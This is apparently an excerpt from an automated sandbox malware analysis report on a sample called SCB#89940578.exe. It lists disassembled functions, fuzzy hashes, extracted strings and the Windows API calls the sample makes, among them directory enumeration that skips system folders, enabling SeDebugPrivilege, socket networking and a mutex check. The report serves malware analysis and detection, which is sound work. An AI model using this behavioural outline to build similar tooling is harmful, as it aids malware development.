]\`, xrefs: 073761F2
[V~*, xrefs: 073760DC
T+-q, xrefs: 073762AA
[V~*, xrefs: 073760D5

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID:
String ID: T+-q$[V~*$[V~*$]\`
API String ID: 0-1849991408
Opcode ID: 8b5cdc25ab10f4a2bca496324a93cf85ff900811b1e43a5251778fd8799a442c
Instruction ID: 0b31071014f5be6ac65331983567fb11d86cf411a1c42bf03c97b4c1a73f6795
Opcode Fuzzy Hash: 8b5cdc25ab10f4a2bca496324a93cf85ff900811b1e43a5251778fd8799a442c
Instruction Fuzzy Hash: 1AB135B0E19619DBDB08CFAAD99189EFBF2BF89300F14D52AD419BB214D3349902CF55

Uniqueness

Uniqueness Score: -1.00%

Function 07375F61 Relevance: 4.0, Strings: 3, Instructions: 259COMMON

Download Yara Rule

Strings

]\`, xrefs: 073761F2
[V~*, xrefs: 073760DC
T+-q, xrefs: 073762AA

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID:
String ID: T+-q$[V~*$]\`
API String ID: 0-3978741314
Opcode ID: f8994f80b9fa806c1f26abc40b781c2feb84d6eefbe42ed71046c4b12895c5d6
Instruction ID: 4712452a2f03c496a54a2b54f1abcfb578f1d7039415c5b10f8409cd08059472
Opcode Fuzzy Hash: f8994f80b9fa806c1f26abc40b781c2feb84d6eefbe42ed71046c4b12895c5d6
Instruction Fuzzy Hash: 4FB144B0E19619DBDB08CFAAD99189EFBF2BF89300F14D52AD419BB214D3349902CF55

Uniqueness

Uniqueness Score: -1.00%

Function 07370006 Relevance: 2.6, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

Kk, xrefs: 0737007E
Z;ya, xrefs: 073700E3

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID:
String ID: Kk$Z;ya
API String ID: 0-687208382
Opcode ID: 621e3fb69221b4f17b1ef92cff2ff4fddb11c3bd6e7de2f906fd29b214b7fbee
Instruction ID: 3e99ff9ae35bec893e76f259e6dba96958bae8dd80b5dce46b7ba7c57bb8fe3c
Opcode Fuzzy Hash: 621e3fb69221b4f17b1ef92cff2ff4fddb11c3bd6e7de2f906fd29b214b7fbee
Instruction Fuzzy Hash: FD519FB4D16249DFDB09CFA9C48049EFBB2EF4A310F14D4AAC409AB212D7389A81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04F30040 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707555025.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f30000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df93f9da7c0832233cc6450c6a0744a3f4f45f1f7b0dfa68bf426883b6ac58fb
Instruction ID: 93aed39a00fe0996c4312ab843ac962cc63f76118bd2961633c94f2fb9af01d9
Opcode Fuzzy Hash: df93f9da7c0832233cc6450c6a0744a3f4f45f1f7b0dfa68bf426883b6ac58fb
Instruction Fuzzy Hash: 3212B8B2C82B458BE390CFA5E94C1897BB1BB41318BD14A09D3625B2E5DFBC9167CF44

Uniqueness

Uniqueness Score: -1.00%

Function 0737F3C8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e903da622579cee274b63d7c37031b855345f38103f1962130fedc5d24cb4756
Instruction ID: 5e7e58136e9d849ade95238bb72b18b2d48b01999f4821c2f74da2cdd9947c2e
Opcode Fuzzy Hash: e903da622579cee274b63d7c37031b855345f38103f1962130fedc5d24cb4756
Instruction Fuzzy Hash: BBE11EB4E1021A8FDB14DFA9C5809AEFBF2FF49314F248159E419AB355DB34A942CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0737D2B8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43fc852b93c9357ca1965e8c62ae857b561ffc2217269fbcca5f3abebe5a39ca
Instruction ID: 57e593e98b09c217b02ee628892d3d8c7e9a4e0cf206aaa373c28a7cc0dc7ac9
Opcode Fuzzy Hash: 43fc852b93c9357ca1965e8c62ae857b561ffc2217269fbcca5f3abebe5a39ca
Instruction Fuzzy Hash: 61E10BB4E102198FDB14DFA9C5809AEFBF2BF89304F248169D419AB356DB35A941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0737EF90 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37261e77049e97f79c2009e744ce74e8de7ac4c7aff7266ee3cbba1920ba4de3
Instruction ID: 886c23a9521dbade4987977e0e87662e997db819d4f39d75d289ddb94a32c58b
Opcode Fuzzy Hash: 37261e77049e97f79c2009e744ce74e8de7ac4c7aff7266ee3cbba1920ba4de3
Instruction Fuzzy Hash: 0AE11DB4E0021A8FDB14DFA9C5809AEFBB2FF89304F248159D419AB355DB35A942CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0737CE80 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4437d28519a915b23f9ae0f87dfe99e528d0417190d227f2d9ac0a27936cb18e
Instruction ID: e0890bb94b66d62eb8df5b290b0b0f5a8ffb496f74646a6641b26d50220558e9
Opcode Fuzzy Hash: 4437d28519a915b23f9ae0f87dfe99e528d0417190d227f2d9ac0a27936cb18e
Instruction Fuzzy Hash: E2E13EB4E102198FDB14DFA9C5809AEFBF2FF89304F249159D419AB315DB34A942CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0737CA48 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2d1165685c3ba9f4de7b51b58929a5e60b9393620956b53f36d819c6d9057a7
Instruction ID: a6608a7ae7a1f33a0a47f217e05dd62945ea440defc3da18728fae9737b5c30a
Opcode Fuzzy Hash: f2d1165685c3ba9f4de7b51b58929a5e60b9393620956b53f36d819c6d9057a7
Instruction Fuzzy Hash: 7EE11DB4E002198FDB14DFA9C5809AEFBB6FF89304F249159E419AB356DB34AD41CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0298D2A4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705635851.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2980000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 015a3dd0af4f06cdd350c1b9ade67ecad9d01c8d5d5b57464641885da4ad0485
Instruction ID: d1384f2217b0de4f1017b593d41aaa65ea2609f468f44061ab843650a09f73fc
Opcode Fuzzy Hash: 015a3dd0af4f06cdd350c1b9ade67ecad9d01c8d5d5b57464641885da4ad0485
Instruction Fuzzy Hash: 8CA17F32E002198FCF05EFB4C85059EBBB6FF85304B19457AE905AB265DB35E916CF40

Uniqueness

Uniqueness Score: -1.00%

Function 07374910 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8de0a8ac7519f492efe3c12a9b39a1bd3bcdc6eefa40058fcbe7c5365d68505b
Instruction ID: 6dd0da5e4f533d60528dcbb864b0c79d6a9b7742b95e3c46167b65e35a9f1e07
Opcode Fuzzy Hash: 8de0a8ac7519f492efe3c12a9b39a1bd3bcdc6eefa40058fcbe7c5365d68505b
Instruction Fuzzy Hash: D1D11430C2075ACACB00EFA4DA90A9DF771FF95304F60879AE40937665EB706AC5CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0737490E Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd92f53c57596aac41c2a7ffde40a1c4b4a7745943d45234d52227a4fb97c631
Instruction ID: 20416393fb44134837f45cc86c1dc98109786db4991ac592a236c6d428a7d79b
Opcode Fuzzy Hash: dd92f53c57596aac41c2a7ffde40a1c4b4a7745943d45234d52227a4fb97c631
Instruction Fuzzy Hash: 10D11430C2075ACACB00EFA4DA90A9DF771FF95304F60879AE40937665EB706AC5CB91

Uniqueness

Uniqueness Score: -1.00%

Function 07370228 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a1ece8c5fbb2281bbec27ce0452c1fd648bec30c9c972c5fd316d4a5635152b
Instruction ID: 003e4a79122dc8c8861d76278f68dcf6ca56c3d67ad0c36785b1dea8ab732ff3
Opcode Fuzzy Hash: 8a1ece8c5fbb2281bbec27ce0452c1fd648bec30c9c972c5fd316d4a5635152b
Instruction Fuzzy Hash: B981F0B4E10219CFCB58CF99C5849AEFBF1FF89250F14915AE419AB720D334AA42CF54

Uniqueness

Uniqueness Score: -1.00%

Function 07370219 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71a07a994a57d7922cb3d66ba5c6f5e2528e1db36b3bbd41ae96edc74744a01c
Instruction ID: a7218cf2c62f3620865ae357dc179413d2e09f245ad6beec462b3ee755eabbf8
Opcode Fuzzy Hash: 71a07a994a57d7922cb3d66ba5c6f5e2528e1db36b3bbd41ae96edc74744a01c
Instruction Fuzzy Hash: 118102B5E10219CFCB58CF99C58599EFBF1FF89250F14916AD419AB320D334AA42CF54

Uniqueness

Uniqueness Score: -1.00%

Function 07371688 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e73912938917d3c074cf094bd9ad0a28c9455bb29687b1201d17265606f2993
Instruction ID: f666f4fbcad52fb23e7b1df87f29901270cf4d1459ea0e55d9071f1b1445703e
Opcode Fuzzy Hash: 6e73912938917d3c074cf094bd9ad0a28c9455bb29687b1201d17265606f2993
Instruction Fuzzy Hash: B76121B197570DDBEB50CF91E08A659FFBAFBCA301F24C595C489A7184DB384AA1CB04

Uniqueness

Uniqueness Score: -1.00%

Function 073710E0 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 751d3d6f2789625fb5356155ad4bc3a59ec36376c31c9785b3a9a4b7f6bf7673
Instruction ID: b2e1e7691eb961e70c3937dcb94f289a9293b539f5bf822e3cbe91f556a12e8b
Opcode Fuzzy Hash: 751d3d6f2789625fb5356155ad4bc3a59ec36376c31c9785b3a9a4b7f6bf7673
Instruction Fuzzy Hash: 726125B5E1120EDFDB14CFAAD4815AEFBB6BB89300F14D05AD429BB204D7389A41CF91

Uniqueness

Uniqueness Score: -1.00%

Function 073710D1 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a363fea6759a1cd3dfe58f41f513de7d972e4a615e1506c557e30547859125dc
Instruction ID: dbd5e80c33ccd528eca4172a5d8a81f1448fd27489eda3d0c52785f6ac9c1318
Opcode Fuzzy Hash: a363fea6759a1cd3dfe58f41f513de7d972e4a615e1506c557e30547859125dc
Instruction Fuzzy Hash: 045148B6E1520EDFDB14CFA9D4815AEFBB6BF89300F14D066D419AB240D7389A41CF91

Uniqueness

Uniqueness Score: -1.00%

Function 07373060 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ba67fec10fdb7a6869fa33dfb5117a36d060076e7039fb13196206564d4ee37
Instruction ID: 85d5c339d3e9b4875ec7bbc020b8714e6523674f15d832da6d471f2f7800f691
Opcode Fuzzy Hash: 2ba67fec10fdb7a6869fa33dfb5117a36d060076e7039fb13196206564d4ee37
Instruction Fuzzy Hash: E05158B0E1524ADFDB08CFA6D4855AEFFF2EF89311F10942AE415A7254D7385A81CF90

Uniqueness

Uniqueness Score: -1.00%

Function 07373070 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e56441619411c90360ec1efc3f3225febe85c18e5e143862cf6a629f29e936de
Instruction ID: 3f705a7f1913817c3b880a468b11fd529539fb4650eaf80f164675a4a0933fed
Opcode Fuzzy Hash: e56441619411c90360ec1efc3f3225febe85c18e5e143862cf6a629f29e936de
Instruction Fuzzy Hash: CC5158B0E1520ACFDB18CFA6D4455EEFBF6EF89301F10942AE409A3254D7385A41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0737D2A9 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ba5a03054dbaf91122e5c4eb1887d8af564749466ff826c5ab40d7abbe415d7
Instruction ID: 1a62c9acdf7dc6fcff4ab23a6af89d1a9c620f29dcb56439e1743f471758c576
Opcode Fuzzy Hash: 2ba5a03054dbaf91122e5c4eb1887d8af564749466ff826c5ab40d7abbe415d7
Instruction Fuzzy Hash: 0D512EB0E102198FDB14DFA9C5819AEFBF2BF89304F24C169D418AB315DB35A941CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0737EF82 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 825f3377dbebf26cffdf478d2f4ed59e3e5656640ef8a4a1ac88afa1c76c716f
Instruction ID: dede3a7c4a4443dac6b7df671624938a44766fd2d4003b48f895400ebc0513a4
Opcode Fuzzy Hash: 825f3377dbebf26cffdf478d2f4ed59e3e5656640ef8a4a1ac88afa1c76c716f
Instruction Fuzzy Hash: D3514EB4E0021A8FDB14DFA9C5815AEFBF2BF89314F24C169D418A7315DB349942CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07371441 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e435bf0c7e9e8b75b7596daad6bbc4d93217676df75330b9e647eb466c4c8d94
Instruction ID: 60534e6ab51447a07e912e96404768bbe6e9cf6c827e41fdf8615af1d883eb9b
Opcode Fuzzy Hash: e435bf0c7e9e8b75b7596daad6bbc4d93217676df75330b9e647eb466c4c8d94
Instruction Fuzzy Hash: 2B4106B1D1120ACFDB18CFAAD8825AEFBB6BF89210F14D16AD419A7204D7349641CF54

Uniqueness

Uniqueness Score: -1.00%

Function 07371450 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86493292dfd56342edc98b272308159d0b990aac25943115507f344a9dc3f0e1
Instruction ID: 3e02860c5d7adfed063065c6bee7ac0bdac972eeae2422791eb80414d203d2f3
Opcode Fuzzy Hash: 86493292dfd56342edc98b272308159d0b990aac25943115507f344a9dc3f0e1
Instruction Fuzzy Hash: 3041E8F1D1121ADBDB58CFAAD8825AEFBF6BF89310F14D12AD419A7200D7349641CF54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: SCB#89940578.exePID: 7272, Parent PID: 7112COMMON

Execution Graph

Execution Coverage:	31.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	1846
Total number of Limit Nodes:	92

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

Windows, xrefs: 00403DEA
Program Files, xrefs: 00403E01
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C
%s\*, xrefs: 00403D99

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Uniqueness

Uniqueness Score: -1.00%

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Uniqueness

Uniqueness Score: -1.00%

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Uniqueness

Uniqueness Score: -1.00%

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B
IDA, xrefs: 00406304

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: d0395f9089772e9078c0cbeb7e7a69d574c5e4bdcef80e12950fd19a5f1576fd
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: d0395f9089772e9078c0cbeb7e7a69d574c5e4bdcef80e12950fd19a5f1576fd
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Uniqueness

Uniqueness Score: -1.00%

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: d0cbd2bfe5b0935c94ba089aae0b4a72727b205c69b8882af43eb62a71f59e55
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: d0cbd2bfe5b0935c94ba089aae0b4a72727b205c69b8882af43eb62a71f59e55
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Uniqueness

Uniqueness Score: -1.00%

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Uniqueness

Uniqueness Score: -1.00%

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

